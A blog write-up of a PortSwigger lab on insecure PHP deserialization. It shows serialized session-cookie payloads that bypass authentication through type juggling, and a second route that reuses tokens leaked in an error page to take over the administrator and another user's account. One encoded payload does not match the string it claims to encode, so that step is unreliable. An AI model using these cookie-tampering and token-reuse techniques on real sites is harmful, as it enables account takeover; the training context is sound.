Lab: Modifying serialized data types | Portswigger

Anas Ibrahim
4 min readOct 27, 2022

--

Web security academy

Hello folks.

This lab is talking about the insecure deserialization, and while I was solving this lab, I discovered that it has a slightly different solution from the well-known and written solution in the lab, so I decided to write about the two methods so that someone might benefit from any information.

Lab description

This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.

You can log in to your own account using the following credentials: wiener:peter

Access the lab

  • Login with your credentials [ wiener : peter ]
  • In Burp, open the post-login GET /my-account request and examine the session cookie using the Inspector to reveal a serialized PHP object. Send this request to Burp Repeater.
  • Decode it as URL then as base64
deserialization format
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh";}
  • In Burp Repeater, use the Inspector panel to modify the session cookie as follows:
  • Update the length of the username attribute to 13.
  • Change the username to administrator.
  • Change the access token to the integer 0. As this is no longer a string, you also need to remove the double-quotes surrounding the value.
  • Update the data type label for the access token by replacing s with i.

The result should look like this:

O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

Modifying data types
  • Encode it as base64 first
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtpOjA7fQ==
  • Then encode it as url
%54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67%36%49%6e%56%7a%5a%58%4a%75%59%57%31%6c%49%6a%74%7a%4f%6a%59%36%49%6e%64%70%5a%57%35%6c%63%69%49%37%63%7a%6f%78%4d%6a%6f%69%59%57%4e%6a%5a%58%4e%7a%58%33%52%76%61%32%56%75%49%6a%74%70%4f%6a%41%37%66%51%3d%3d
  • Copy this url encoding format and paste it in Cookie (inspector) and refresh the page
  • Wow , i got to access admin panel ans have the permission to delete any user.
access admin panel

Second method

While solving the lab , i made an error in session format it was an internal server error and the server leaked all tokens which stored in the system.

Internal server error

We know that portswigger labs have three main users ( wiener - carlos - administrator )

The leaked tokens :

$access_tokens = [z95mls52t3l8efgp85tfl1aalg54hyg9, gjv08qeybgi7kisid7dsen67zsdj0vbc, f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh]

Wiener token was : f7cfcxeq2ya3wgxm5jdwsthlmvstnfuh

So , i have another two tokens and one of them maybe related to administrator

  • I tried this token : z95mls52t3l8efgp85tfl1aalg54hyg9
  • Then i changed the token value as the following format
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"z95mls52t3l8efgp85tfl1aalg54hyg9";}

but it still an internal server error , so the token not related to the administrator user

  • I changed token to the last one : gjv08qeybgi7kisid7dsen67zsdj0vbc
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"gjv08qeybgi7kisid7dsen67zsdj0vbc";}

It succeeded , now i can access the administrator panel and delete users.

admin panel

So , i solved the lab.

Solved

After browsing admin panel i thought for seconds and tried the last token to access carlos account (account takeover) why not ?

  • So, i changed the length of username character from 13 to 6
  • I changed the value of username from administrator to carlos as the following format
  • I changed the token with the last one.
O:4:"User":2:{s:8:"username";s:6:"carlos";s:12:"access_token";s:32:"z95mls52t3l8efgp85tfl1aalg54hyg9";}

So , i encoded it as base64 then as url and paste it in cookie

account takeover

So , i can access carlos account.

In the end, I tried to solve the laptop in all possible ways, and I hope that you have benefited, even with a small information.

--

--

Anas Ibrahim
Anas Ibrahim

Responses (1)